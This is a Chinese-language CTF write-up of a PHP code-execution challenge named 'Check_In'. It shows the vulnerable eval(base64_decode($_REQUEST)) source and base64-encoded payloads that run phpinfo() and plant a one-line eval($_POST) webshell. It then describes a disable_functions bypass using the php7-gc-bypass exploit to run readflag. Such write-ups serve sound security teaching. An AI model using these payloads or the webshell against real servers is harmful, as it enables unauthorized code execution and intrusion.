打开题目,直接得到源码
<title>Check_In</title>
<?php
highlight_file(__FILE__);
class ClassName
{
public $code = null;
public $decode = null;
function __construct()
{
$this->code = @$this->x()['Ginkgo'];
$this->decode = @base64_decode( $this->code );
@Eval($this->decode);
}
public function x()
{
return $_REQUEST;
}
}
new ClassName();
源码较为简单,总结一下就是
eval(base64_decode($_REQUEST['Ginkgo']))
存在代码执行漏洞,却发现很多函数被ban了,可能是开启了disable_function,这里先尝试是否能执行phpinfo()
phpinfo(); base64加密之后cGhwaW5mbygpOw==
/?Ginkgo=cGhwaW5mbygpOw==
执行成功,查看一下disable_function中被ban的函数
所以,这里需要绕过disable_function,先传一句话木马连接上shell
一句话木马eval($_POST[‘A’]); 加密之后得ZXZhbCgkX1BPU1RbJ0EnXSk7
/?Ginkgo=ZXZhbCgkX1BPU1RbJ0EnXSk7
在根目录文件下发现flag文件和readflag文件,猜测执行readflag就能读取到flag,但是权限等问题无法读取和执行
这里就需要使用绕过disable_function的技巧,通过phpinfo得知,该php的版本为7.3,在该版本下,php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3,给出了exp
下载后进行修改,改为执行readflag
然后通过蚁剑进行上传这里发现tmp目录权限是1777,于是决定上传到这个目录
上传成功
通过之前的一句话来执行文件包含,得到flag